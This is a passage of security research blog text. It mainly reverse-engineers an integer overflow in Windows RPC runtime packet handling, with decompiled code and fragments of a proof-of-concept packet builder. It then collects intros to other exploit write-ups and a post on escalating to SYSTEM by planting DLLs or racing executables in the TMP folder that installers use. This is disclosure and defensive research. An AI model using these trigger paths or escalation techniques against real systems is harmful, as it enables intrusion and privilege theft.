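    put32(out + 12, call_id);
    put32(out + 16, alloc_hint);
    put16(out + 20, ctx_id);
    put16(out + 22, opnum);
    if (stub_len > 0)
        memcpy(out + REQ_HDR_LEN, stub, stub_len);
    return total;
}
```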

With this PoC, however, triggering the vulnerability seemed impossible because of some checks in ProcessReceivedPDU(). Basically, the check that prevents the integer from overflowing is performed on the size of the message queue.

OSF_SCALL::ProcessReceivedPDU()
{
  ...
              iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
              if (iVar8 == 0) {
                    /* integer overflow! */
                *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
                if (((pkt_flags & 2) != 0) &&
                   (*(undefined4 *)(this + 0x21c) = 3, ((byte)this[0x2e0] & 4) != 0)) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
                if (*(longlong *)(this + 0x18) != 0) {
                  if ((*(uint *)(this + 0x250) == 0) ||
                     ((*(uint *)(this + 0x24c) < *(uint *)(this + 0x250) &&
                      (*(int *)(this + 0x21c) != 3)))) {
                    if ((3 < *(int *)(this + 0x264)) &&
                       ((*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 &&
                        (uVar9 = 0, *(int *)(this + 0x21c) != 3)))) {
                      *(undefined4 *)(this + 0x2ac) = 1;
                      uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1
                    }
                  }
                  else {
                    *(undefined4 *)(this + 0x250) = 0;
                    SCALL::IssueNotification((SCALL *)this,2);
                  }
                  RtlLeaveCriticalSection(pOVar3);
                  return uVar9;
                }
                if (((3 < *(int *)(this + 0x264)) &&
                    (*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0)) &&
                   (*(int *)(this + 0x21c) != 3)) {
                  *(undefined4 *)(this + 0x2ac) = 1;
                  uVar9 = uVar19; // critical instruction that makes ProcessReceivedPDU() return 1; my code entered here
                }
                RtlLeaveCriticalSection(pOVar3);
                SetEvent(*(HANDLE *)(this + 0x2c0));
                return uVar9; // 
              }
  ...

When ProcessReceivedPDU() returns 1, the server stops listening for new messages on that connection, so the client can no longer trigger the vulnerability: the caller re-arms the receive only when the return value is 0.

LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
      }
LAB_18003d2b5:
      if (iVar4 == 0) {
LAB_18003d3c3:
        (**(code **)(*this + 0x38))(); // OSF_SCONNECTION::TransAsyncReceive(): keeps reading new packets from the descriptor
      }
      REFERENCED_OBJECT::RemoveReference(this);
      goto LAB_18003d2c5;
    }

To avoid the paths that make the server stop listening for new packets (on the same connection, of course), at least one of these conditions must not hold:

3 < *(int *)(this + 0x264) // number of queued packets
*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 // don't know
*(int *)(this + 0x21c) != 3  // not satisfied on the packet with the last fragment flag set

*(this + 0x21c) is set to 3 if the packet has the last fragment flag set.

The number of queued packets is incremented by PutOnQueue() and decremented by TakeOffQueue(), and since, under the conditions above, ProcessReceivedPDU() stops reading once more than 3 packets are queued, the queue could hold at most 4 packets. This seemed very strange to me: the application is multithreaded, yet it behaved like a single-threaded one, simply because I never saw TakeOffQueue() being called during my experiments.

int __thiscall QUEUE::PutOnQueue(QUEUE *this,void *param_1,uint param_2)
{
  ...
  *(int *)(this + 0xc) = iVar6 + 1;
  **(void ***)this = param_1;
  *(uint *)(*(longlong *)this + 8) = param_2;
  return 0;
}


undefined8 QUEUE::TakeOffQueue(longlong *param_1,undefined4 *param_2)
{
  int iVar1;
  
  iVar1 = *(int *)((longlong)param_1 + 0xc);
  if (iVar1 == 0) {
    return 0;
  }
  *(int *)((longlong)param_1 + 0xc) = iVar1 + -1;
  *param_2 = *(undefined4 *)(*param_1 + -8 + (longlong)iVar1 * 0x10);
  return *(undefined8 *)(*param_1 + (longlong)*(int *)((longlong)param_1 + 0xc) * 0x10);
}
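Reading the two routines together: TakeOffQueue() pops the entry at index count - 1 (each entry is 0x10 bytes, a buffer pointer followed at +8 by its length), while the visible part of PutOnQueue() stores the new entry at index 0 and increments the count. Assuming the elided part of PutOnQueue() shifts the existing entries up by one (my guess, not verified), the queue behaves as a FIFO, as in this C sketch with hypothetical names and a fixed capacity.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define QUEUE_CAP 8  /* hypothetical fixed capacity, only for this sketch */

/* One 0x10-byte entry on x64: buffer pointer at +0, length at +8. */
typedef struct { void *buf; unsigned len; } queue_entry;

typedef struct {
    queue_entry items[QUEUE_CAP];
    int count;                    /* the counter at +0xc in the real QUEUE */
} msg_queue;

/* Insert at index 0, shifting older entries up (assumed elided part). */
static int put_on_queue(msg_queue *q, void *buf, unsigned len) {
    assert(q != NULL);
    if (q->count == QUEUE_CAP)
        return 1;                 /* non-zero = failure, the caller checks iVar8 == 0 */
    memmove(&q->items[1], &q->items[0], (size_t)q->count * sizeof q->items[0]);
    q->items[0].buf = buf;
    q->items[0].len = len;
    q->count++;
    return 0;
}

/* Pop the entry at index count - 1, i.e. the oldest one; NULL when empty. */
static void *take_off_queue(msg_queue *q, unsigned *len) {
    assert(q != NULL && len != NULL);
    if (q->count == 0)
        return NULL;
    q->count--;
    *len = q->items[q->count].len;
    return q->items[q->count].buf;
}
```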

In general my thought on the server status was the following:

  1. A thread running somewhere in DispatchRpcCall() after receiving the packet that forced the call to DispatchRpcCall(), i.e. constraint number 3.
  2. A thread that keeps reading from the medium, though I did not know from where.

So I inspected DispatchRpcCall() more closely.

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
    uVar3 = RpcpConvertToLongRunning(this,param_2,param_3);
    bVar7 = (int)uVar3 != 0;
    if (bVar7) {
      uVar1 = 0xe;
    }
    else {
      this = (longlong *)param_1[0x26];
      uVar1 =  OSF_SCONNECTION::TransAsyncReceive(); // this should wake up a thread to handle new incoming packet
    }
    if (uVar1 == 0) {
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      DispatchHelper(param_1);
      if (*(int *)(pOVar6 + 0x18) == 0) { // this is the (this + 0x130) + 0x18)
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
      pcVar4 = OSF_SCALL::RemoveReference(); // calling this means that the connection is over!
    }
    else {
      uVar3 = param_1[0x1c] - 0x18;
      if (uVar3 != 0) {
        BCACHE::Free((ulonglong)this,uVar3,param_3);
      }
      if (bVar7) {
        CleanupCallAndSendFault(param_1,(ulonglong)uVar1,0);
      }
      else {
        CleanupCall(param_1,uVar3,param_3);
      }
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::AbortQueuedCalls(pOVar6);
        pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      }
  ...
}

int OSF_SCONNECTION::TransAsyncReceive(longlong *param_1,undefined8 param_2,undefined8 param_3)

{
  int iVar1;
  
  REFERENCED_OBJECT::AddReference((longlong)param_1,param_2,param_3);
  if (*(int *)(param_1 + 5) == 0) {
                    /* CO_Recv */
    iVar1 = CO_Recv(); // 0 if the read was submitted; non-zero is an error status and the connection is aborted
    if (iVar1 != 0) {
      if ((*(int *)(param_1 + 3) != 0) && (*(int *)((longlong)param_1 + 0x1c) == 0)) {
        OSF_SCALL::WakeUpPipeThreadIfNecessary((OSF_SCALL *)param_1[0xf],0x6be);
      }
      *(undefined4 *)(param_1 + 5) = 1;
      AbortConnection(param_1);
    }
  }
  else {
    AbortConnection(param_1);
    iVar1 = -0x3ffdeff8;
  }
  return iVar1;
}

ulonglong CO_Recv(PSLIST_HEADER param_1,undefined8 param_2,SIZE_T param_3)

{
  uint uVar1;
  ulonglong uVar2;
  
  if ((*(int *)&param_1[4].field_0x8 != 0) &&
     (*(int *)&param_1[4].field_0x8 == *(int *)&param_1[4].field_0x4)) {
    uVar1 = RPC_THREAD_POOL::TrySubmitWork(CO_RecvInlineCompletion,param_1);
    uVar2 = (ulonglong)uVar1;
    if (uVar1 != 0) {
      uVar2 = 0xc0021009;
    }
    return uVar2;
  }
  uVar2 = CO_SubmitRead(param_1,param_2,param_3); // ends in calling NMP_CONNECTION::Receive
  return uVar2;
}

According to my breakpoints, TransAsyncReceive() is executed, which makes the server wait for a new packet after the one that led to DispatchRpcCall(). If TransAsyncReceive() returns 0, the next packet will be read and handled by another thread, while this one proceeds to call DispatchHelper(). At this point I pictured two threads:

  1. A thread started from TransAsyncReceive() that handles new packets by entering ProcessReceivedPDU(), and keeps reading until it returns 1.
  2. A thread that enters DispatchHelper().

So I started tracking the memory at (this + 0x130) + 0x18 to find where it is set to 1. This field matters both ways: if it is not 0, the condition that makes ProcessReceivedPDU() return 1 is no longer satisfied and the server keeps reading; if it is 0, DispatchRpcCall() calls DispatchQueuedCalls(), which executes TakeOffQueue().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
  ...
}

void __thiscall OSF_SCONNECTION::DispatchQueuedCalls(OSF_SCONNECTION *this)
{
  longlong *plVar1;
  undefined4 local_res8 [2];
  
  while( true ) {
    RtlEnterCriticalSection(this + 0x118);
    plVar1 = (longlong *)QUEUE::TakeOffQueue((longlong *)(this + 0x1b8),local_res8); // decrement no. queued messages
    if (plVar1 == (longlong *)0x0) break;
    RtlLeaveCriticalSection();
    OSF_SCALL::DispatchHelper(plVar1);
    ...
  }
  ...
  return;
}

(this + 0x130) + 0x18 is set to 1 during the association (bind) request, at rpcrt4.dll+0x38b99, only if the multiplexed packet flag (PFC_CONC_MPX, 0x10) is not set.

void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{

        if ((tcp_received->pkt_flags & 0x10U) == 0) {
          *(undefined4 *)(param_1 + 0x18) = 1;
          *(byte *)((longlong)pppppvVar21 + 3) = *(byte *)((longlong)pppppvVar21 + 3) | 3;
        }
}

So, setting RPC_INTERFACE_HAS_PIPES in the server interface and specifying the multiplex flag when connecting (this part is under client control) leads the code to the vulnerable point. At this point the debugger breaks in OSF_SCALL::GetCoalescedBuffer(), which is another vulnerable function.

The code gets there through this stack trace:

rpcrt4.dll+0xb404d in OSF_SCALL::Receive()
rpcrt4.dll+0x4b297 in RPC_STATUS I_RpcReceive()
rpcrt4.dll+0x82422 in NdrpServerInit()
rpcrt4.dll+0x1c35e in NdrStubCall2()
                      NdrServerCall2()
rpcrt4.dll+0x57832 in DispatchToStubInCNoAvrf()
rpcrt4.dll+0x39e00 in RPC_INTERFACE::DispatchToStubWorker()
rpcrt4.dll+0x39753 in DispatchToStub()
rpcrt4.dll+0x3a2bc in OSF_SCALL::DispatchHelper()
                      DispatchRPCCall()

So, with this PoC, execution enters GetCoalescedBuffer() every n packets, where the second integer overflow can be triggered.

OSF_SCALL::GetCoalescedBuffer() is reached only because the server has RPC_INTERFACE_HAS_PIPES configured. Walking back the stack trace from the last function before OSF_SCALL::GetCoalescedBuffer(), I looked for the constraints I had satisfied that led me to the vulnerable code.

long __thiscall OSF_SCALL::Receive(OSF_SCALL *this,_RPC_MESSAGE *param_1,uint param_2)
{
  ...
      while (iVar3 = *(int *)(this + 0x21c), iVar3 != 1) { // this + 0x21c does not seem to be set to 1 in ProcessReceivedPDU(); I did not find where it is
        
        if (iVar3 == 2) {
          return *(long *)(this + 0x20);
        }
        if (iVar3 == 3) { // it is equal to 3 on the last frag packet, from ProcessReceivedPDU
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4);
          return lVar2; // last frag received -> no more packets will be waited!
        }
        // if the total length of the queued packets is <= the fragment size negotiated at bind time, wait for new data
        if (*(uint *)(this + 0x24c) <= (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8)) { 
          EVENT::Wait((EVENT *)(this + 0x2c0),-1); // wait for other packets
        }
        else { 
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4); // run coalesced buffer
          if (lVar2 != 0) { // error
            return lVar2;
          }
          ...
        }
        ...
      }
  ...
}

// (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8) is set during the association (bind) request
void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{
  ...
    uVar18 = *(ushort *)((longlong)&tcp_received->alloc_hint + 2);
    if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
      uVar26 = *(uint *)&tcp_received->cxt_id;
      uVar23 = uVar23 >> 8 | uVar23 << 8;
      uVar18 = uVar18 >> 8 | uVar18 << 8;
      *(ushort *)((longlong)&tcp_received->alloc_hint + 2) = uVar18;
      *(uint *)&tcp_received->cxt_id =
           uVar26 >> 0x18 | (uVar26 & 0xff0000) >> 8 | (uVar26 & 0xff00) << 8 | uVar26 << 0x18;
      *(ushort *)&tcp_received->alloc_hint = uVar23;
    }
    puVar24 = (undefined4 *)(ulonglong)uVar23;
    uVar14 = (ushort)*(undefined4 *)(*(longlong *)(param_1 + 0x20) + 0x4c);
    uVar3 = 0xffff;
    if (uVar23 != 0xffff) {
      uVar3 = uVar23;
    }
    if (uVar3 <= uVar18) {
      uVar18 = uVar3;
    }
    if (uVar18 <= uVar14) {
      uVar14 = uVar18;
    }
    *(ushort *)(param_1 + 0xb8) = uVar14 & 0xfff8; // min(max_xmit_frag, max_recv_frag, server value) of the bind packet, rounded down to a multiple of 8 (Ghidra shows the two bind fields through alloc_hint)
  ...
}
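In a bind PDU the 16-byte common header is followed by max_xmit_frag (u16), max_recv_frag (u16) and assoc_group_id (u32), which is why the code above byte-swaps two ushorts overlapping the field Ghidra named alloc_hint and a uint at cxt_id. Under that reading, the value stored at +0xb8 is the smaller of the client's two fragment sizes and a server-side value, rounded down to a multiple of 8. A minimal sketch (the function name is hypothetical):

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical model of the value AssociationRequested() stores at +0xb8.
   client_xmit / client_recv: max_xmit_frag and max_recv_frag from the bind body.
   server_value: the ushort read from (param_1 + 0x20) + 0x4c. */
static uint16_t negotiated_frag_size(uint16_t client_xmit, uint16_t client_recv,
                                     uint16_t server_value) {
    uint16_t v = client_xmit < client_recv ? client_xmit : client_recv;
    if (server_value < v)
        v = server_value;
    return (uint16_t)(v & 0xfff8);   /* round down to a multiple of 8 */
}
```

If this reading is right, a client that proposes small fragment sizes in its bind lowers the threshold that OSF_SCALL::Receive() compares the queued length against.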

Basically, OSF_SCALL::Receive() keeps waiting for new packets until a packet with the last fragment flag is received or an error occurs.

GetCoalescedBuffer() is called when the last fragment is received or when the total length queued by ProcessReceivedPDU() exceeds the value stored at (this + 0x130) + 0xb8; because of the latter condition, it is called every n packets.

So, simply by increasing the fragment length in the PoC, it's possible to trigger GetCoalescedBuffer() without setting the multiplex flag. Moreover, OSF_SCALL::Receive() is reached because (Message->RpcFlags & 0x8000) == 0:

RPC_STATUS I_RpcReceive(PRPC_MESSAGE Message,uint Size)
{
  ...
    if ((Message->RpcFlags & 0x8000) == 0) {
                    /* get  OSF_SCALL::Receive address */
      pcVar5 = *(code **)(*plVar7 + 0x38);
    }
    else {
                    /* get NDRServerInitializeMarshall address */
      pcVar5 = *(code **)(*plVar7 + 0x48);
    }
                    /* call coalesced buffer */
    uVar2 = (*pcVar5)();
  ...
}

void NdrpServerInit()
{
  ...
    if (param_5 == 0) {
      if ((*(byte *)(*(ushort **)(puVar2 + 0x10) + 2) & 8) == 0) {
        ...

        ...
        if ((param_2->RpcFlags & 0x1000) == 0) {  // During my tests this value was 0 each time; I didn't search for when this could fail
        param_2->RpcFlags = 0x4000;               // leads to GetCoalescedBuffer() being called
        puStackY96 = (undefined *)0x180082427;
        exception = I_RpcReceive(param_2,0);
        if (exception != 0) {
                    /* WARNING: Subroutine does not return */
          puStackY96 = &UNK_180082432;
          RpcRaiseException(exception);
        }
        param_1->Buffer = (uchar *)param_2->Buffer;
        puVar10 = (uchar *)param_2->Buffer;
        param_1->BufferStart = puVar10;
        param_1->BufferEnd = puVar10 + param_2->BufferLength;
        param_3 = pMVar20;
      }
  ...
}

GetCoalescedBuffer() merges the queued buffers with the last received packet, which was not queued: it allocates the total length needed and then copies the last packet and every queued message into the new buffer.

long __thiscall OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2)
{
  ...
  iVar5 = *(int *)(this + 0x24c);
  if (iVar5 != 0) {
    if (uVar3 != 0) {
  /* integer overflow */
      iVar5 = iVar5 + *(int *)(param_1 + 0x18);
    }
    lVar2 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this_00,&local_res8,iVar5 + 0x18);
    if (lVar2 == 0) {
      dst_00 = (void *)((longlong)local_res8 + 0x18);
      dst = dst_00;
      local_res8 = dst_00;
      if ((uVar3 != 0) && (*(void **)(param_1 + 0x10) != (void *)0x0)) {
        memcpy(dst_00,*(void **)(param_1 + 0x10),*(uint *)(param_1 + 0x18));
        local_res8 = (void *)((ulonglong)*(uint *)(param_1 + 0x18) + (longlong)dst_00);
        OSF_SCONNECTION::TransFreeBuffer() // free last message PDU received
  ...
      }
      while (src = (void *)QUEUE::TakeOffQueue((longlong *)(this + 600),(undefined4 *)&local_res8), src != (void *)0x0) { 
        // loop to consume the queue merging the queued packets
        uVar4 = (ulonglong)local_res8 & 0xffffffff;
        memcpy(dst,src,(uint)local_res8);
                    /* OSF_SCONNECTION::TransFreeBuffer  */
        OSF_SCONNECTION::TransFreeBuffer() // free PDU buffer queued
        dst = (void *)((longlong)dst + uVar4);
      }
      ...
      *(undefined4 *)(this + 0x24c) = 0;
      ...
}
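The addition flagged as integer overflow is done in 32 bits, while the copies write every buffer at its own length. This C sketch uses hypothetical function names, takes the lengths from this + 0x24c and param_1 + 0x18 as in the decompiled code, and assumes the queued total has not already wrapped. It shows how the requested size wraps while the number of bytes to copy does not.

```c
#include <assert.h>
#include <stdint.h>

/* Size requested from TransGetBuffer(): 32-bit arithmetic, as in the binary.
   queued_len models this + 0x24c, last_len models param_1 + 0x18. */
static uint32_t coalesced_alloc_size(uint32_t queued_len, uint32_t last_len) {
    uint32_t total = queued_len + last_len;  /* the addition marked "integer overflow" */
    return total + 0x18u;
}

/* Bytes the last-packet copy plus the queue-draining loop would write,
   computed in 64 bits so nothing wraps. */
static uint64_t coalesced_copy_size(uint32_t queued_len, uint32_t last_len) {
    return (uint64_t)queued_len + last_len;
}
```

With 0xFFFFFFF0 queued bytes and a 0x20-byte last packet, TransGetBuffer() would be asked for only 0x28 bytes while the copies write 0x100000010 bytes.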

At this point, merging the new constraints with the old ones, the conditions that lead to the vulnerable point can be summarized as follows:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> the integer at offset 0x58 of the RPC interface defined in the server has its lowest bit (0x1) set - **Not under attacker control**
  2. Client sends a first fragment that initializes the call id object and satisfies the condition to call DispatchRpcCall() directly: its data length equals the alloc hint, so in ProcessReceivedPDU() the check (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) is false, DispatchRpcCall() is executed and param_1 + 0x214 is set to 1 - Under attacker control
  3. Client keeps sending middle fragments until iVar5 = iVar5 + *(int *)(param_1 + 0x18); in GetCoalescedBuffer() overflows and leads memcpy() to overflow the buffer - Under attacker control

Bad points:

  1. The fragment length is two bytes long, so exploitation is very hard because it is time and memory consuming - Under attacker control, highly constrained
  2. I found no way to cheat on the fragment length value versus the bytes actually sent, i.e. they must be consistent with each other.

Together, these force the client to send a huge number of fragments, so exploitation could be impossible because of system memory: just before the request that overflows the integer, the server must be able to allocate about 4 GB of memory for the coalesced buffer. If the memory cannot be allocated, an exception is raised. Even assuming the RPC server could allocate more than 4 GB, there is the problem of time: the number of packets to send is very large, and the processing time grows enormously with the total length of the queued data.
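To put a number on the time and memory problem: assuming each request fragment carries a 24-byte header and no auth trailer, and that the server accepts fragments of the chosen size, this sketch (hypothetical function name) computes how many maximum-size fragments are needed before the size passed to TransGetBuffer() (total + 0x18) wraps past 2^32.

```c
#include <assert.h>
#include <stdint.h>

#define REQ_HDR_LEN 24u  /* request header, assuming no auth trailer or object UUID */

/* Fewest fragments of max_frag_len bytes whose stub data, summed, reaches
   2^32 - 0x18, the smallest total for which total + 0x18 wraps in 32 bits. */
static uint64_t fragments_to_wrap(uint32_t max_frag_len) {
    assert(max_frag_len > REQ_HDR_LEN);
    uint64_t per_frag = max_frag_len - REQ_HDR_LEN;
    uint64_t target = (UINT64_C(1) << 32) - 0x18;
    return (target + per_frag - 1) / per_frag;  /* ceiling division */
}
```

With 0xFFFF-byte fragments this gives 65562 fragments, roughly 4 GB of stub data that the server has to keep around; with 0xFFF8-byte fragments (the largest value AssociationRequested() can store after & 0xfff8) it gives 65569.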

My final PoC is available here: PoC. Below, the debugger shows the breakpoint hit on the vulnerable addition in the function that coalesces the buffers.

Trying To Exploit A Windows Kernel Arbitrary Read Vulnerability

Introduction

I recently discovered a very interesting kernel vulnerability that allows reading arbitrary kernel-mode addresses. Sadly, the vulnerability was patched in Windows 21H2 (OS Build 22000.675), and I am unsure which CVE was assigned to it. In this short blog post, I will share my journey of trying to exploit this vulnerability. Although I didn’t finish the exploit in the end, I have decided to share this with everyone anyway.

This Font is not Your Type

Half a year ago, I found a vulnerability in libFontParser.dylib, which is part of the CoreGraphics library that is widely used in macOS, iOS and iPadOS to parse and render fonts. This vulnerability was patched in iOS 13.5.1 and macOS 10.15.5. In this writeup, I will describe the bug in detail in the hope that it will help others better understand this vulnerability. This issue could allow an attacker to execute code during the parsing of a malicious font.

HackSys Extreme Vulnerable Driver 3 - Double Fetch

This post is a writeup of a Double Fetch in HackSys Extreme Vulnerable Driver. We assume that you already have an environment set up to follow along. For reference, this post uses Windows 10 Pro x64 RS1 and HEVD 3.00. If you are not sure how to set up a kernel debugging environment, you can find plenty of posts about the process online. We will not cover it in this post.

CVE Farming through Software Center – A group effort to flush out zero-day privilege escalations

Intro

In this blog post we discuss a zero-day topic for finding privilege escalation vulnerabilities discovered by Ahmad Mahfouz. It abuses applications like Software Center, which are typically used in large-scale environments for automated software deployment performed on demand by regular (i.e. unprivileged) users.

Since the topic resulted in a possible attack surface across many different applications, we organized a team event titled “CVE farming” shortly before Christmas 2021.

Attack Surface, 0-day, … What are we talking about exactly?

NVISO contributors from different teams (both red and blue!) and Ahmad gathered together on a cold winter evening to find new CVEs.

Targets? More than one hundred installation files that you could normally find in the software center of enterprises.
Goal? Find out whether they could be used for privilege escalation.

The original vulnerability (patient zero) resulting in the attack surface discovery was identified by Ahmad and goes as follows:

Companies correctly don’t give administrative privileges to all users (according to the least privilege principle). However, they also want the users to be able to install applications based on their business needs. How is this solved? Software Center portals using SCCM (System Center Configuration Manager, now part of Microsoft Endpoint Manager) come to the rescue. Using these portals enables users to install applications without giving them administrative privileges.

However, there is an issue. More often than not, these portals run the installation program with SYSTEM privileges, and the installer in turn uses a temporary folder for reading or writing resources during installation. The TMP environment variable of SYSTEM has a special characteristic: the folder it points to is writable by a regular user.

Consider the following example:

By running the previous command, we just successfully wrote to a file located in the TEMP directory of SYSTEM.

Even if we can’t read the file anymore on some systems, rest assured that the file was successfully written:

To check that SYSTEM really has TMP pointing to C:\Windows\TEMP, you could run the following commands (as administrator):

PsExec64.exe /s /i cmd.exe

echo %TMP%

The /s option of PsExec tells the program to run the process in the SYSTEM context. By contrast, if you try to write to a file in an Administrator account’s TMP directory, access is denied. So if the installation runs under Administrator rather than SYSTEM, it is not vulnerable to this attack.
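To check the same property from a regular (non-elevated) account without relying on shell commands, a small probe that tries to create a file in a directory is enough. This is a minimal Python sketch. The function name and the probe file naming are illustrative assumptions. The probe only tests file creation, which is the property the attack relies on.

```python
import os
import uuid


def can_create_file_in(directory: str) -> bool:
    """Return True if the current user can create a new file in `directory`.

    Only creation is tested: on some systems a regular user may be allowed to
    create files in a folder without being allowed to read them back.
    """
    probe = os.path.join(directory, f"probe_{uuid.uuid4().hex}.tmp")
    try:
        # O_EXCL guarantees we never open (or clobber) an existing file.
        fd = os.open(probe, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
    except OSError:  # PermissionError, FileNotFoundError, ... all derive from OSError
        return False
    os.close(fd)
    try:
        os.remove(probe)  # best-effort cleanup; the ACL may not allow deletion
    except OSError:
        pass
    return True
```

For example, on the systems described above, can_create_file_in(r"C:\Windows\Temp") run as a regular user would be expected to return True.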

How can this be abused?

Consider a situation where the installation program, executed under a SYSTEM context:

  • Loads a dll from TMP
  • Executes an exe file from TMP
  • Executes an msi file from TMP
  • Creates a service from a sys file in TMP

This provides some interesting opportunities! For example, the installation program can search in TMP for a dll file. If the file is present, it will load it. In that case the exploitation is simple; we just need to craft our custom dll, rename it, and place it where it is being looked for. Once the installation runs we get code execution as SYSTEM.

Let’s take another example. This time the installation creates an exe file in TMP and executes it. In this case it can still be exploitable, but we have to abuse a race condition. What we need to do is craft our own exe file and continuously overwrite the target exe file in TMP with our own exe. Then we start the installation and hope that our own exe file will be executed instead of the one from the installation. We can introduce a small delay, for example 50 milliseconds, between the writes, hoping the installation will drop its exe file, which gets replaced by ours and executed by the installation within that small delay. Note that this kind of exploitation might take more patience, and the installation process might need to be restarted multiple times to succeed. The video below shows an example of such a race condition:

However, even when executing under a SYSTEM context, applications can take precautions against abuse. Many of them read/write their resources to/from a randomized subdirectory in TMP, making exploitation nearly impossible. We did notice that in some cases the directory appears random but in fact remains constant between installations, which still allows abuse.
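One way to check whether an installer’s “random” subdirectory is really constant, or which binaries it drops into TMP at all, is to snapshot the folder before and after each installation and compare the results. The Python sketch below is a hypothetical helper, not the NVISO tooling mentioned later. It records files with the extensions from the abuse cases above (.dll, .exe, .msi, .sys). It assumes TMP is cleaned between two installation runs. Any new path that shows up in both runs points to a predictable location.

```python
import os

# Extensions taken from the abuse cases listed above.
INTERESTING_EXTENSIONS = {".dll", ".exe", ".msi", ".sys"}


def snapshot(directory: str) -> set:
    """Return relative paths of interesting files under `directory`.

    os.walk silently skips subfolders we are not allowed to list.
    """
    found = set()
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if os.path.splitext(name)[1].lower() in INTERESTING_EXTENSIONS:
                found.add(os.path.relpath(os.path.join(root, name), directory))
    return found


def new_files(before: set, after: set) -> list:
    """Files present after the installation that were not there before."""
    return sorted(after - before)


def recurring_paths(first_run_new: set, second_run_new: set) -> list:
    """New files dropped at the same path by two runs: a not-so-random location."""
    return sorted(first_run_new & second_run_new)
```

Typical use: take before = snapshot(tmp), run the installer, take after = snapshot(tmp), and inspect new_files(before, after). Then repeat on a clean TMP and pass the two sets of new files to recurring_paths.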

So, what was the end result?

Out of 95 tested installers, 13 were vulnerable, 7 need further investigation, and 75 were not found to be vulnerable. Not a bad result, considering that those are 13 easy-to-use zero-day privilege escalation vulnerabilities 😉. We reported them to the respective developers but were met with limited enthusiasm. Ahmad and NVISO also reported the attack surface to Microsoft, and there is no fix for the file system permission design. The recommendation is for installers to follow the defense-in-depth principle, which puts responsibility with the developers who package their software.

If you’re interested in identifying this issue on systems you have permission to test, you can use the helper programs we will soon release in an accompanying GitHub repository.

Stay tuned!

Defense & Mitigation

Since the Software Center is working as designed, what are some ways to defend against this?

  • Set AppEnforce user context if possible
  • Developers should consider absolute paths while using custom actions or make use of randomized folder paths
  • As a possible IoC for hunting: Identify DLL writes to c:\windows\temp
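For developers, the randomized-folder advice can be followed with standard library facilities rather than a home-grown naming scheme. The sketch below is a minimal Python illustration. It assumes the installer logic can create its own working folder. tempfile.mkdtemp picks an unpredictable name, creates the directory itself (never reusing an existing one), and requests mode 0o700, which on POSIX systems restricts it to the creating user. How that mode maps to Windows ACLs depends on the Python version, so treat the permission part as something to verify on the target platform. The helper names are hypothetical.

```python
import os
import shutil
import tempfile


def make_private_workdir(prefix: str = "setup_") -> str:
    """Create an unpredictably named working folder and return its absolute path.

    mkdtemp() only ever returns a directory it created itself and requests
    mode 0o700 (owner-only on POSIX).
    """
    return os.path.abspath(tempfile.mkdtemp(prefix=prefix))


def payload_path(workdir: str, filename: str) -> str:
    """Absolute path for a dropped file; basename() strips any directory parts."""
    return os.path.join(workdir, os.path.basename(filename))


def cleanup(workdir: str) -> None:
    """Remove the working folder and everything in it."""
    shutil.rmtree(workdir, ignore_errors=True)
```

The design choice is to let the standard library handle name generation and atomic creation, and to build every path as absolute, instead of relying on a fixed name under TMP that another user could pre-create or predict.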


About the authors

Ahmad, who discovered this attack surface, is a cyber security researcher mainly focused on attack surface reduction and detection engineering. Prior to that he worked in software development and system administration, and he holds multiple certifications in advanced penetration testing and system engineering. You can find Ahmad on LinkedIn.

Oliver, the main author of this post, is a cyber security expert at NVISO. He has almost a decade and a half of IT experience, half of which is in cyber security. Throughout his career he has obtained many useful skills and certifications. He’s constantly exploring and looking for more knowledge. You can find Oliver on LinkedIn.

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing. As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge. You can find Jonas on LinkedIn.


Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG

Introduction

